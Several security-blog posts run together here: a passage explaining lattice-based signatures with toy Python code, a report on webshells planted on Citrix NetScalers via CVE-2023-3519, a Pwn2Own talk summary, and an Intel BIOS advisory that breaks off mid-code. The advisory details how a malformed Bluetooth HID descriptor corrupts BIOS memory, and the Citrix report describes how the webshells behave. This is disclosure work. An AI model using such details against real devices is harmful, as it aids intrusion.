Taking a similar approach, we can use the one-way function defined using SIS to define lattice-based identification and signature schemes, using an approach first introduced by Lyubashevsky in [Lyu08].

As a first try, we might try to define an identification scheme as follows. First, fix a matrix A \in \mathbb{Z}_q^{n \times m} as part of the protocol parameters. Then, for each iteration of the identification scheme, choose a random bounded \vec{y}, commit to it by computing the one-way function \vec{w} = A \vec{y}, and respond to challenges as follows:

Unfortunately, this protocol can leak information about Alice’s secret key. Indeed, since the multiplication and addition step \vec{z} = \vec{s}c + \vec{y} is performed over an infinite group – in particular, over a bounded subset of the infinite group, due to practical limitations – the result cannot be uniformly distributed over the resulting space. In particular, edge values of coordinates of \vec{z}, such as particularly large or small values of z_i, leak data about the corresponding coordinates of the secret.

If c=1, signatures risk leaking data about the secret \vec{s}. Indeed, if any coordinate z_i of \vec{z} is equal to 0 for a given signature, then it must be that y_i + cs_i = 0, and hence (since all values are non-negative) that y_i = s_i = 0. On the other hand, if any coordinate z_i of \vec{z} is equal to 5m, we must have that y_i = 5m-1 and s_i = 1. Similarly, the signature scheme Dilithium chooses c from the set \{-1,0,1\}. In this case, computing \vec{z} = \vec{y} + c\vec{s}_1 leaks information whenever \|\vec{z}\|_\infty is above a particular bound (when \|\vec{z}\|_\infty \geq 5m if the parameters are chosen as above).

Additionally, we also cannot modify \vec{y} to never leak information. Indeed, since \vec{y} is output when c = 0, the distribution of \vec{y} values that don’t leak information would itself leak information about the secret. For instance, if we modified the sampling process of \vec{y} so that y_i is never 0 for any i such that s_i = 0 (to avoid the leakage of the first case described above), then the fact that some coordinates of \vec{y} are never 0 would be discovered when sending the challenge c = 0, and would reveal that those coordinates of the secret \vec{s} are also 0 with high probability.

One possible modification to the identification scheme that can be done to avoid this leakage is simply to make the bounds so large that getting a value of z_i that would leak information happens with negligible probability. Unfortunately, this would lead to much larger key and communication sizes, and would correspond to an easier version of the SIS problem.

The solution to this dilemma is straightforward – simply check whether a given \vec{z} = \vec{s}c + \vec{y} would leak information before responding to a challenge. If it would, we simply abort by sending \vec{z} = \perp (which is a special value rejected by the verifier), and try again. If no information would be leaked, we proceed as usual (see footnote 2).
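A minimal sketch of this abort check follows, assuming the toy ranges used in this post (secret coordinates in {0,1}, y_i in {0, ..., 5m-1}, and a response rejected when any z_i equals 0 or 5m). The function names and the choice m = 4 are hypothetical. The second helper enumerates every possible y_i for one coordinate and counts the accepted responses, so we can compare the two possible values of the secret coordinate.

```python
from collections import Counter

def respond(s, y, c, bound):
    """Return z = y + c*s, or None (abort) if a coordinate hits 0 or bound."""
    z = [yi + c * si for yi, si in zip(y, s)]
    if any(zi <= 0 or zi >= bound for zi in z):
        return None
    return z

def accepted_values(s_i, c, bound):
    """Count the accepted z_i over every possible y_i in {0, ..., bound-1}."""
    counts = Counter()
    for y_i in range(bound):
        z = respond([s_i], [y_i], c, bound)
        if z is not None:
            counts[z[0]] += 1
    return counts

bound = 5 * 4  # 5m with the toy choice m = 4
# Compare the accepted responses for s_i = 0 and s_i = 1 under challenge c = 1.
print(accepted_values(0, 1, bound) == accepted_values(1, 1, bound))
```

In both cases the accepted values are spread evenly over {1, ..., 5m-1}, so a response that is actually sent carries no information about s_i. Each coordinate aborts with probability 1/(5m).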

Determining the success probability of a single round can then allow us to determine the expected number of rounds necessary for the verifier to accept with a given probability. It can be shown that this protocol is witness indistinguishable, so these rounds can be performed in parallel, at the cost of some computation and communication overhead.

However, if this new “identification scheme with aborts” is turned into a signature scheme using the Fiat-Shamir heuristic, then we can do better. Indeed, since the “challenge” is generated from the commitment and message using a cryptographic hash function, the signer simply needs to generate new (random) commitments to retry an aborted round of the identification scheme, and repeat until no data is leaked. This process is called “Fiat-Shamir with Aborts”, and allows a signature to have the same size as the communication cost of a single (successful) round of the identification scheme. Putting it all together, we get the following signature scheme:

KeyGen():

1. \mathrm{sk}: \vec{s} \sim \{0,1\}^m
2. \mathrm{pk}:  \vec{p} = A\vec{s}

Sign(m):

1. Let \sigma = \perp
2. While \sigma = \perp:
   1. For i = 1 .. k, sample \vec{y}_i \sim \{0,...,5m-1\}^m, and let \vec{w}_i = A\vec{y}_i. Let Y = [\vec{y}_1, ..., \vec{y}_k] and 
      W = [\vec{w}_1,...,\vec{w}_k]
   2. c=H(W, m) \in \{0,1\}^k
   3. For i = 1.. k, \vec{z}_i = \vec{y}_i + c_i \vec{s}. Let Z = [\vec{z}_1,..., \vec{z}_k]
   4. If any coordinate Z_{i,j} is 0 or 5m, set \sigma = \perp. Otherwise, set \sigma = ( Z, W)
3. Return signature \sigma = (Z, W)

Verify(\sigma = (Z, W), m):

1. c' = H(W, m)
2. For i = 1 .. k, check that A\vec{z}_i == c'_i\vec{p} + \vec{w}_i and that all coordinates satisfy 0 < Z_{i,j} < 5m
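The whole scheme above fits in a short Python sketch. Everything concrete here is an assumption made for illustration: the toy parameters q, n, m, k are far too small to be secure, A is sampled once at random, and H is a hypothetical instantiation that takes k challenge bits from a SHA-256 digest.

```python
import hashlib
import secrets

# Toy parameters (assumptions for illustration only, far too small to be secure).
q, n, m, k = 97, 3, 6, 8
BOUND = 5 * m
A = [[secrets.randbelow(q) for _ in range(m)] for _ in range(n)]

def mat_vec(vec):
    """Compute A * vec modulo q."""
    return [sum(a * x for a, x in zip(row, vec)) % q for row in A]

def H(W, message):
    """Derive k challenge bits from the commitments W and the message."""
    digest = hashlib.sha256(repr(W).encode() + b"|" + message).digest()
    return [(digest[i // 8] >> (i % 8)) & 1 for i in range(k)]

def keygen():
    s = [secrets.randbelow(2) for _ in range(m)]   # secret in {0,1}^m
    return s, mat_vec(s)                           # (sk, pk = A*s)

def sign(s, message):
    while True:
        Y = [[secrets.randbelow(BOUND) for _ in range(m)] for _ in range(k)]
        W = [mat_vec(y) for y in Y]
        c = H(W, message)
        Z = [[yj + ci * sj for yj, sj in zip(y, s)] for y, ci in zip(Y, c)]
        if all(0 < zij < BOUND for z in Z for zij in z):
            return Z, W
        # Otherwise abort: a coordinate would leak, so retry with fresh Y.

def verify(pk, message, signature):
    Z, W = signature
    c = H(W, message)
    for z, w, ci in zip(Z, W, c):
        if any(not 0 < zij < BOUND for zij in z):
            return False
        if mat_vec(z) != [(ci * pj + wj) % q for pj, wj in zip(pk, w)]:
            return False
    return True

sk, pk = keygen()
sig = sign(sk, b"hello lattice")
print(verify(pk, b"hello lattice", sig))
```

With these toy values each of the k·m = 48 coordinates survives with probability 1 - 1/(5m), so an attempt succeeds with probability (29/30)^48, roughly 0.2, and signing takes about five attempts on average.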

The signature scheme Dilithium that has been chosen for standardization by NIST is designed using the above template. As the time required to generate a signature depends on the expected number of iterations, parameters are generally selected so that the expected number of iterations required until a valid signature is generated is relatively small. For example, Dilithium is expected to take between 4 and 7 rounds to output a signature.

In general, lattice signature schemes based on the one-way function \vec{x} \to A\vec{x} are very fast, as matrix-vector multiplications are very efficient operations. However, these schemes generally have very large keys and signatures. This is because each key consists of a vector of m elements, and each signature consists of two matrices of m \times k elements, a commitment matrix W and the matrix Z. This results in parameters of a few thousand bytes for public keys and signatures. (In Dilithium, for example, the recommended (optimized) parameters for NIST level III result in a public key size of 1472 bytes, and a signature size of 2701 bytes.) However, there are a number of different optimizations that can be used to reduce the key sizes, possibly at the cost of complexity or of increased computations, which we’ll discuss in the following section.

Options and Optimizations

One straightforward optimization that can be done is to generate the matrix A, which is part of a public key, from a seed, using an extendable output function such as SHAKE. This can then be re-computed by the verifier at a relatively low cost, and avoids having the entire matrix A as part of the public key. The matrix A can also be defined as a public parameter of a scheme, with each individual key pair simply consisting of the short value \vec{s} as a secret key, and of A\vec{s} as the public key. However, this requires generating the global parameter A in a trusted manner, and, combined with the above optimization, only reduces the size of the public key by the size of the seed, so this optimization is usually not included.
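The seed-expansion idea can be sketched with SHAKE-128 from Python's hashlib. The function name expand_matrix, the two-bytes-per-entry encoding, and the toy modulus are assumptions made for illustration and do not follow any particular specification. In particular, reducing modulo q as done here introduces a small bias, which a real scheme would avoid, for instance with rejection sampling.

```python
import hashlib

def expand_matrix(seed, n, m, q):
    """Expand a short seed into an n x m matrix over Z_q using SHAKE-128."""
    stream = hashlib.shake_128(seed).digest(2 * n * m)  # two bytes per entry
    entries = [
        int.from_bytes(stream[2 * i:2 * i + 2], "little") % q
        for i in range(n * m)
    ]
    # Cut the flat list of entries into n rows of m entries each.
    return [entries[r * m:(r + 1) * m] for r in range(n)]

seed = b"public-seed-0001"  # only this short seed needs to be published
A = expand_matrix(seed, n=4, m=6, q=257)
print(A == expand_matrix(seed, n=4, m=6, q=257))  # the verifier recomputes A
```

Only the seed is stored in the public key; signer and verifier both call the expansion and obtain the same matrix.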

A second common optimization method is to define the lattices over rings or modules. This results in additional structure within the lattices, which can be used to obtain smaller key sizes as well as faster computation speeds. As an example, Dilithium is defined over elements from the polynomial ring \mathbb{Z}_q[X]/(X^{256} + 1), which allows the use of the Number Theoretic Transform (NTT) to speed up matrix-vector multiplications. As a consequence of this change, the signature scheme depends on slightly different security assumptions (the ring/module versions of the existing ones), but these are not currently known to be less secure than their non ring/module counterparts.

Another possible optimization method comes from a modification of the rejection sampling procedure: one can think of the aborts described earlier as a form of rejection sampling with a target uniform distribution. Other target distributions can be used instead, such as a Gaussian distribution (or related variant), which minimizes the signature size for an equivalent security level; see for example [Lyu11] and [DDLL13]. However, this comes at the cost of additional code complexity, as it requires implementing high-precision Gaussian sampling. Hence, some signature schemes, including Dilithium, chose to stick with the standard uniform distribution for rejection sampling for simplicity.

Using a different approach, some additional efficiency can be obtained for an SIS-based signature scheme by introducing a second security assumption, as done by [BG13]. The Learning With Errors (LWE) problem is usually used in lattice-based encryption schemes, and asks to determine the secret \vec{s} when given the pair (A, \vec{b} = A\vec{s} + \vec{e}), where \vec{e} is a short error vector. The decisional version of the LWE problem asks to distinguish pairs (A, A\vec{s} + \vec{e}) from pairs generated from a uniform distribution. However, note that we could instead phrase this as the decisional problem of distinguishing the pairs (\bar{A}, \bar{A}\vec{s}) from uniformly random pairs, where \bar{A} = [A|I] and \vec{s} = (\vec{s}_1, \vec{s}_2), since \bar{A}\vec{s} = \bar{A}(\vec{s}_1, \vec{s}_2) = A\vec{s}_1 + I \vec{s}_2 = A\vec{s}_1 + \vec{s}_2 (and is thus exactly an LWE sample provided \vec{s}_1 and \vec{s}_2 are sampled from the appropriate distributions). This allows one to use the same Fiat-Shamir structure to obtain signatures with hardness based on the LWE assumption by modifying the keygen process (in addition to the original hardness assumption of SIS, for technical reasons) – and results in shorter signatures. This optimization is included in Dilithium, and can be seen in their keygen process.
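The rewriting of an LWE sample as a product with \bar{A} = [A|I] is easy to check numerically. The sketch below uses arbitrary toy dimensions and a toy modulus (assumptions for illustration only), and samples the short vectors from {-1,0,1}.

```python
import secrets

# Toy parameters (assumptions for illustration only).
q, n, m = 97, 4, 3

A = [[secrets.randbelow(q) for _ in range(m)] for _ in range(n)]
s1 = [secrets.randbelow(3) - 1 for _ in range(m)]  # short secret
s2 = [secrets.randbelow(3) - 1 for _ in range(n)]  # short error

def mat_vec(matrix, vec):
    """Compute matrix * vec modulo q."""
    return [sum(a * x for a, x in zip(row, vec)) % q for row in matrix]

# LWE form: b = A*s1 + s2 (mod q).
b_lwe = [(t + e) % q for t, e in zip(mat_vec(A, s1), s2)]

# SIS-style form: b = [A | I] * (s1, s2) (mod q).
A_bar = [row + [1 if i == j else 0 for j in range(n)] for i, row in enumerate(A)]
b_bar = mat_vec(A_bar, s1 + s2)

print(b_lwe == b_bar)  # both forms give the same vector
```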

Finally, once the signature framework is fully defined, it is also possible to make additional scheme-specific optimizations or apply compression techniques to minimize the key size. In Dilithium, for example, it was observed that it is possible to compress the signature by omitting some of the low-order bits of some elements in \mathbb{Z}_q, and instead including a vector of one-bit hints that are used to ensure the result of computations is correct.

Conclusion

The description of lattice-based signature schemes can often seem intimidating at first glance, but at the heart of these schemes are the same constructions used for well-known classical signature schemes, with a few small modifications to adapt these constructions to the case of the infinite groups known as lattices.

Since these first lattice-based schemes, many additional techniques have been introduced to mitigate the various drawbacks of lattice primitives, whether that is the large size of keys and signatures in Fiat-Shamir schemes, or the complexity of implementing secure preimage sampling in hash-and-sign schemes. However, these simple constructions can still be found at the core of modern lattice signature schemes today, and will hopefully help gain an intuition for the working of the more complex constructions that are being standardized.

Many thanks to Paul Bottinelli and Giacomo Pope for their careful review. Any remaining errors are mine alone.

Footnotes

1: This hash function is not suitable for all cryptographic applications; while it is collision resistant and one-way, it is not a fully random function (for instance, A(x_1 + x_2) = Ax_1 + Ax_2, which allows one to infer an underlying structure). While this may be a problem for some applications that require the output of a hash function to be indistinguishable from random, it is also often useful in other settings such as in homomorphic encryption.

2: A similar approach can also work in the classical setting: Girault’s ID scheme [Gir90] is a variant of Schnorr’s identification protocol, but computes the discrete log modulo a composite number N and performs the multiplication z = sc + y over the integers. Security comes from choosing a y in a range much larger than that of sc, so no leak occurs with very high probability. In [Lyu08], Lyubashevsky showed that the parameters can be significantly reduced by switching to a variant with aborts.

References

[Falcon]: P. Fouque et al., Falcon: Fast-Fourier Lattice-based Compact Signatures over NTRU, 2020, https://falcon-sign.info/falcon.pdf.

[Dilithium]: S. Bai et al., CRYSTALS-Dilithium Algorithm Specifications and Supporting Documentation (Version 3.1), 2021, https://pq-crystals.org/dilithium/data/dilithium-specification-round3-20210208.pdf.

[Gir90]: M. Girault, An identity-based identification scheme based on discrete logarithms modulo a composite number, 1990, https://link.springer.com/content/pdf/10.1007/3-540-46877-3_44.pdf.

[Lyu08]: V. Lyubashevsky, Lattice-Based Identification Schemes Secure Under Active Attacks, 2008, https://iacr.org/archive/pkc2008/49390163/49390163.pdf.

[Pei10]: C. Peikert, An Efficient and Parallel Gaussian Sampler for Lattices, 2010, https://eprint.iacr.org/2010/088.pdf.

[Lyu11]: V. Lyubashevsky, Lattice Signatures Without Trapdoors, https://eprint.iacr.org/2011/537.pdf.

[DDLL13]: L. Ducas et al., Lattice Signatures and Bimodal Gaussians, https://eprint.iacr.org/2013/383.pdf.

[BG13]: S. Bai and S. Galbraith, An improved compression technique for signatures based on learning with errors, https://eprint.iacr.org/2013/838.pdf.

Approximately 2000 Citrix NetScalers backdoored in mass-exploitation campaign

Fox-IT (part of NCC Group) has uncovered a large-scale exploitation campaign of Citrix NetScalers in a joint effort with the Dutch Institute of Vulnerability Disclosure (DIVD). An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing webshells on vulnerable NetScalers to gain persistent access. The adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted. At the time of writing, more than 1900 NetScalers remain backdoored. Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure has notified victims.

Figure 1: A global overview of known-compromised NetScalers located in each country, as of August 14th 2023

Main Takeaways

  • A set of vulnerabilities in NetScaler, one of which allows for remote code execution, was disclosed on July 18th. This disclosure followed reports from several security organisations of limited exploitation of these vulnerabilities in the wild.
  • Fox-IT (in collaboration with the Dutch Institute of Vulnerability Disclosure) have scanned for these webshells to identify compromised systems. Responsible disclosure notifications have been sent by the DIVD.
  • At the time of this exploitation campaign, 31127 NetScalers were vulnerable to CVE-2023-3519.
  • As of August 14th, 1828 NetScalers remain backdoored.
  • Of the backdoored NetScalers, 1248 are patched for CVE-2023-3519.

Recommendations for NetScaler Administrators

  • A patched NetScaler can still contain a backdoor. It is recommended to perform an Indicator of Compromise check on your NetScalers, regardless of when the patch was applied.
    • Fox-IT has provided a Python script that utilizes Dissect to perform triage on forensic images of NetScalers.
    • Mandiant has provided a bash-script to check for Indicators of Compromise on live systems. Be aware that if this script is run twice, it will yield false positive results as certain searches get written into the NetScaler logs whenever the script is run.
  • If traces of compromise are discovered, secure forensic data. It is strongly recommended to make a forensic copy of both the disk and the memory of the appliance before any remediation or investigative actions are taken. If the Citrix appliance is installed on a hypervisor, a snapshot can be made for follow-up investigation.
  • If a webshell is found, investigate whether it has been used to perform activities. Usage of the webshell should be visible in the NetScaler access logs. If there are indications that the webshell has been used to perform unauthorised activities, it is essential to perform a larger investigation, to identify whether the adversary has successfully taken steps to move laterally from the NetScaler, towards another system in your infrastructure.

Investigation and Disclosure Timeline

July 2023: Identifying and disclosing NetScalers vulnerable to CVE-2023-3519

Recently, three vulnerabilities were reported to be present in Citrix ADC and Citrix Gateway. Based on the information shared by Citrix, one of these vulnerabilities (CVE-2023-3519) gives an attacker the opportunity to perform unauthenticated remote code execution. Citrix, and various other organisations, also shared information regarding the fact that this vulnerability is actively being exploited in the wild.

At the time that Citrix disclosed information about CVE-2023-3519, details on how this vulnerability could be exploited were not publicly known. Using prior research on the identification of Citrix versions, we were able to quickly identify which Citrix servers on the web were vulnerable to CVE-2023-3519. This information was shared with the Dutch Institute of Vulnerability Disclosure (DIVD), who were able to notify administrators that they had vulnerable NetScalers exposed to the internet.

About the Dutch Institute of Vulnerability Disclosure (DIVD):

DIVD is a Dutch research institute that works with volunteers who aim to make the digital world safer by searching the internet for vulnerabilities and reporting the findings to those who can fix these vulnerabilities.

https://www.divd.nl/code/

In parallel with sharing the data with the DIVD, Fox-IT and NCC Group cross-referenced their scan data with their customer base to inform managed services customers shortly prior to the DIVD disclosure.

August 8th and 9th 2023: Identifying backdoored NetScalers

In July and August, the Fox-IT CERT (part of NCC Group) responded to several incidents related to CVE-2023-3519. Several webshells were found during these investigations. Based on both the findings of these IR engagements and Shadowserver’s Technical Summary of Observed Citrix CVE-2023-3519 Incidents, we were confident that the adversary had exploited the vulnerability at a large scale in an automated fashion.

While the discovered webshells return a 404 Not Found, the response still differs from how Citrix servers ordinarily respond to a request for a file that does not exist. Moreover, the webshell will not execute any commands on the target machine unless given proper parameters. These two factors combined allow us to scan the internet for webshells with high confidence, without impacting affected NetScalers.

In cooperation with the DIVD we decided to scan NetScalers accessible on the internet for known webshell paths. These scans may be recognized in Citrix HTTP Access logs by the User-Agent: DIVD-2023-00033. We initially only scanned systems that were not patched on July 21st, as the exploitation was believed to be between July 20th and July 21st. Later, we decided to also scan the systems that were already patched on July 21st. The results exceeded our expectations. Based on the internet wide scan, approximately 2000 unique IP addresses seem to have been backdoored with a webshell as of August 9th.

August 10th: Responsible Disclosure by the DIVD

Starting from August 10th, the DIVD has begun reaching out to organisations affected by the webshell. They used their already existing network and responsible disclosure methods to notify network owners and national CERTs. It however remains possible that this notification doesn’t reach the right people in time. We would therefore like to repeat the advice to manually perform an IOC check on your internet exposed NetScaler devices.

Findings

Most apparent from our scanning results is the percentage of patched NetScalers that still contain a backdoor. At the time of writing, approximately 69% of the NetScalers that contain a backdoor are not vulnerable anymore to CVE-2023-3519. This indicates that while most administrators were aware of the vulnerability and have since patched their NetScalers to a non-vulnerable version, these NetScalers have not been (properly) checked for signs of successful exploitation.

Figure 2: The large majority of known compromised NetScalers are patched.

Thus, administrators may currently have a false sense of security, even though an up-to-date NetScaler may still have been backdoored. The high percentage of patched NetScalers that have been backdoored is likely a result of the time at which mass exploitation took place. From incident response cases, we can confirm Shadowserver’s prior estimate that this specific exploitation campaign took place between late July 20th and early July 21st:

Figure 3: While patches were being applied, exploitation took place at a large scale between July 20th and July 21st.

We could not discern a pattern in the targeting of NetScalers. We have seen some systems that have been compromised with multiple webshells, but we also see large volumes of NetScalers that were vulnerable between July 20th and July 21st and have not been compromised with a backdoor. In total we have found 2491 webshells across 1952 distinct NetScalers. Globally, there were 31127 NetScalers vulnerable to CVE-2023-3519 on July 21st, meaning that the exploitation campaign compromised 6.3% of all vulnerable NetScalers globally.

Figure 4: Amount of Compromised NetScalers per country as of August 14th 2023
Figure 5: Amount of vulnerable NetScalers per country as of July 21st 2023

It appears the majority of compromised NetScalers reside in Europe. Of the top 10 affected countries, only 2 are located outside of Europe. There are stark differences between countries in terms of what percentage of their NetScalers were compromised. For example, while Canada, Russia and the United States of America all had thousands of vulnerable NetScalers on July 21st, virtually none of these NetScalers were found to have a webshell on them. As of now, we have no clear explanation for these differences, nor do we have a confident hypothesis to explain which NetScalers were targeted by the adversary and which ones were not. Moreover, we do not see a particular targeting in terms of victim industry.

As of August 14th, 1828 NetScalers remain compromised. While we see a decline in the amount of compromised NetScalers following the disclosure on August 10th, we hope that this publication can raise further awareness that backdoors can persist even when Citrix servers are updated. Therefore, we again recommend any NetScaler administrator to perform basic triage on their NetScalers.

Conclusion

The monitoring and protection of edge devices such as NetScalers remains challenging. Sometimes, the window in which defenders must patch their systems is incredibly small. CVE-2023-3519 was exploited in targeted attacks before a patch was available and was later exploited on a large scale. System administrators need to be aware that adversaries can exploit edge devices to place backdoors that persist even after updates and / or reboots. As of now, it is strongly advised to check NetScalers, even if they have been patched and updated to the latest version. Resources are available at the Fox-IT GitHub.


SysPWN – VR for Pwn2Own

Alex Plaskett (@alexjplaskett) presented a talk on the 10th of August 2023 at @SysPWN covering vulnerability research for Pwn2Own.

The first section of the talk covered a high-level perspective of the event, personal history, and teams. It then discussed some considerations to weigh when deciding on a target, along with experiences and learnings from the competition.

The second section of the talk was divided by category, covering the vulnerabilities which NCC Group EDG used at the event in 2021 and 2022.

The first category covered was the Soho Smash-Up, which targeted the Ubiquiti EdgeRouter to first obtain code execution via the WAN interface. This was then used to pivot to exploiting a Lexmark printer attached via the LAN interface.

The second category discussed was an exploit used against a Lexmark printer via Printer Job Language (PJL) input to compromise the printer.

The slides for the talk are available here:

Intel BIOS Advisory – Memory Corruption in HID Drivers 

This advisory is the third in a series of posts that cover vulnerabilities I found while auditing the “ICE TEA” leak, which resulted in the exposure of Intel’s and Insyde Software’s proprietary BIOS source code. The other two blog posts can be found here (TOCTOU in Intel SMM) and here (multiple memory safety issues in Insyde Software SMM).

In this post, I will be focusing on two additional BIOS vulnerabilities. The first bug impacts the Bluetooth keyboard driver (HidKbDxe in BluetoothPkg) and the second bug impacts a touch panel driver (I2cTouchPanelDxe in AlderLakePlatSamplePkg).  

Both vulnerabilities were fixed by Intel on August 8th with the 2023.3 IPU release. Intel’s advisory can be found here

What The HID?

To understand the issues that I will be covering in this blog, it is necessary to very briefly introduce the relevant portions of the HID specification – the Report Descriptor data structure. 

First of all, HID stands for Human Interface Device. Unsurprisingly, HID devices allow humans to interact with a computer. Products like keyboards, mice, gaming controllers, and touchscreens are all examples of HID devices. 

The HID specification requires that every device must define the format of its data packets in a structure known as the Report Descriptor. The HID device sends this Report Descriptor to the host to convey various things, such as how many different packet types (Reports) are supported, the packet sizes, and the purpose (Usage) of each packet.  

How information is organized in a Report Descriptor (Section 5.4 of the HID spec)

Shown below is the Report Descriptor for my mouse. Note the defined Usages for the Button and Wheel, which I think we’d all agree are typical mouse-like features we’d expect to find. By the way, each element in a Report Descriptor (the below rows) is called an Item.

0x05, 0x01, // Usage Page (Generic Desktop Ctrls) 
0x09, 0x02, // Usage (Mouse) 
0xA1, 0x01, // Collection (Application) 
0x09, 0x01, //   Usage (Pointer) 
0xA1, 0x00, //   Collection (Physical) 
0x05, 0x09, //     Usage Page (Button) 
0x19, 0x01, //     Usage Minimum (0x01) 
0x29, 0x08, //     Usage Maximum (0x08) 
0x15, 0x00, //     Logical Minimum (0) 
0x25, 0x01, //     Logical Maximum (1) 
0x75, 0x01, //     Report Size (1) 
0x95, 0x08, //     Report Count (8) 
0x81, 0x02, //     Input (Data, Var, Abs, No Wrap, Linear, Preferred State, No Null Position) 
0x05, 0x01, //     Usage Page (Generic Desktop Ctrls) 
0x09, 0x30, //     Usage (X) 
0x09, 0x31, //     Usage (Y) 
0x09, 0x38, //     Usage (Wheel) 
0x15, 0x81, //     Logical Minimum (-127) 
0x25, 0x7F, //     Logical Maximum (127) 
0x75, 0x08, //     Report Size (8) 
0x95, 0x03, //     Report Count (3) 
0x81, 0x06, //     Input (Data, Var, Rel, No Wrap, Linear, Preferred State, No Null Position) 
0xC0,       //   End Collection 
0xC0,       // End Collection 
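To make the Item structure concrete, here is a minimal sketch of a short-item walker. It relies on the short-item prefix layout from the HID specification (bits 0-1 give the data size, bits 2-3 the item type, bits 4-7 the tag) and sums Report Size × Report Count over every Input item. The function name hid_input_bits and the enum names are my own, and the sketch deliberately ignores Report IDs, Push/Pop, and long items; it is not taken from any of the drivers discussed in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Item types and tags, as encoded in the short-item prefix byte. */
enum { TYPE_MAIN = 0, TYPE_GLOBAL = 1 };
enum { TAG_INPUT = 0x8, TAG_REPORT_SIZE = 0x7, TAG_REPORT_COUNT = 0x9 };

/*
 * Walk a Report Descriptor and sum Report Size * Report Count over all
 * Input items. Returns 0 and stores the total bit count in *bits, or
 * returns -1 if the descriptor is truncated, uses a long item, or the
 * running total would overflow.
 */
int hid_input_bits(const uint8_t *desc, size_t len, uint64_t *bits)
{
    uint32_t report_size = 0, report_count = 0;
    uint64_t total = 0;
    size_t pos = 0;

    assert(desc != NULL && bits != NULL);
    while (pos < len) {
        uint8_t prefix = desc[pos++];
        if (prefix == 0xFE)
            return -1;                        /* long item: not handled here */

        size_t size = prefix & 0x03;          /* bSize: 0, 1, 2, or 3 (= 4 bytes) */
        if (size == 3)
            size = 4;
        unsigned type = (prefix >> 2) & 0x03; /* bType */
        unsigned tag  = prefix >> 4;          /* bTag  */

        if (size > len - pos)
            return -1;                        /* data would run past the buffer */

        uint32_t value = 0;                   /* item data is little-endian */
        for (size_t i = 0; i < size; i++)
            value |= (uint32_t)desc[pos + i] << (8 * i);
        pos += size;

        if (type == TYPE_GLOBAL && tag == TAG_REPORT_SIZE) {
            report_size = value;
        } else if (type == TYPE_GLOBAL && tag == TAG_REPORT_COUNT) {
            report_count = value;
        } else if (type == TYPE_MAIN && tag == TAG_INPUT) {
            uint64_t add = (uint64_t)report_size * report_count;
            if (total + add < total)
                return -1;                    /* 64-bit wrap-around */
            total += add;
        }
    }
    *bits = total;
    return 0;
}
```

Run over the mouse descriptor above, this yields 32 bits: 8 one-bit buttons plus three 8-bit relative axes (X, Y, Wheel). Note how every length is checked against the remaining buffer before it is used, which is the kind of care the rest of this post is about.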

Once the host driver has processed the Report Descriptor, it is then able to communicate with the peripheral device. It does this by sending or receiving Report packets. There are three types of Reports: 

  • Input Reports: Data sent from the device to the host (e.g., a mouse reporting that a button has been pressed)
  • Output Reports: Data sent from the host to the device (e.g., the host requesting that your keyboard turn on/off an LED)
  • Feature Reports: Data sent in either direction (e.g., configuration or calibration data) 

The important takeaway from all of this is that these Reports and Report Descriptors are fully attacker controlled. A malicious HID device could send arbitrary data in these packets. For example, a descriptor could have malformed Report Size or Report Count values, or it could contain an excessive number of Usage Pages or Collections. The host driver that communicates with the HID peripheral must parse these structures extremely carefully to avoid memory safety problems. 

Memory Corruption Due to Malformed Bluetooth Keyboard HID Report (CVE-2022-44611)

CVSS 6.9 <CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L> 

Impact

A remote attacker that is positioned within Bluetooth proximity to the victim device can corrupt BIOS memory by sending malformed HID Report structures. 

Description

The BtHidParseReportMap() function (not shown) is responsible for performing the initial shallow parsing of the Report Descriptor that was received from a Bluetooth keyboard. After this parsing is complete, the Report Descriptor is saved, and any driver feature that needs it can call the GetReportFormatList() function.  

Shown below is one example where the Descriptor is accessed so that the driver can determine whether the keyboard has LEDs so that it can turn them on or off by sending an Output Report.  

EFI_STATUS SetKeyLED ( IN HID_KB_DEV *HidKbDev  ) 
{ 
  ... 
  LIST_ENTRY     *Link; 
  LIST_ENTRY     *Cur; 
  ... 
  HidKbDev->Hid->GetReportFormatList(HidKbDev->Hid,  Link); 
  Cur = GetFirstNode (Link); 
  ... 

This function first walks the Report’s items and searches for all LED-related Usage Pages, which it then processes to calculate the total size of the Output Report in HidKbDev->OutLedReportSize.  

  ... 
  UINT8          *Data; 
  ... 
  HID_REPORT_FMT *ReportItem; 
  ... 
  if (HidKbDev->OutLedReportSize == 0){ 
    while (!IsNull (Link, Cur)) { 
      ReportItem = ITEM_FROM_LINK(Cur); 
      if (ReportItem->UsagePage == BT_HID_LED_USAGE_PAGE) 
        HidKbDev->OutLedReportSize = HidKbDev->OutLedReportSize  
                        + (ReportItem->ReportCount * ReportItem->ReportSize); 
      Cur = GetNextNode (Link, Cur); 
    } 
    Cur = GetFirstNode (Link); 
  } 
  Data = (UINT8 *)AllocateZeroPool(HidKbDev->OutLedReportSize/8); 
  ... 

Unfortunately, the function doesn’t properly account for Usage Pages with zero-sized Report Count fields, nor does it properly handle Usage Pages whose product of Count and Size is not a multiple of 8. So, for the sake of argument, let’s imagine a malicious Bluetooth keyboard that presents a malformed descriptor composed of multiple LED Usage Pages, structured like this: 

  • Almost all pages have a ReportCount=0 and a ReportSize=7 
  • Followed by a single page that has a ReportCount=1 and a ReportSize=8 

This will result in HidKbDev->OutLedReportSize being equal to 8, because the sum that is calculated by the while-loop (0*7 + 0*7 + … + 1*8) is simply 8. In this case, Data would point to a 1-byte buffer that is allocated on the heap. 
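The size arithmetic can be replayed in isolation. The following is a small model of the first while-loop, not the driver code itself: led_item_t and the three helper functions are hypothetical names, and only the two fields that feed the sum are modelled. It also shows a rounded-up byte count as one possible alternative to the truncating division; I am not claiming this is how Intel fixed it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Only the two fields that feed the size computation are modelled. */
typedef struct {
    uint32_t report_size;   /* bits per field   */
    uint32_t report_count;  /* number of fields */
} led_item_t;

/* Sum of ReportCount * ReportSize, as in the first while-loop. */
uint32_t led_report_bits(const led_item_t *items, size_t n)
{
    uint32_t bits = 0;

    assert(items != NULL || n == 0);
    for (size_t i = 0; i < n; i++)
        bits += items[i].report_count * items[i].report_size;
    return bits;
}

/* Allocation size as computed in the listing: truncating division. */
uint32_t alloc_bytes_truncated(uint32_t bits)
{
    return bits / 8;
}

/* A rounded-up alternative that never drops a partial byte. */
uint32_t alloc_bytes_rounded_up(uint32_t bits)
{
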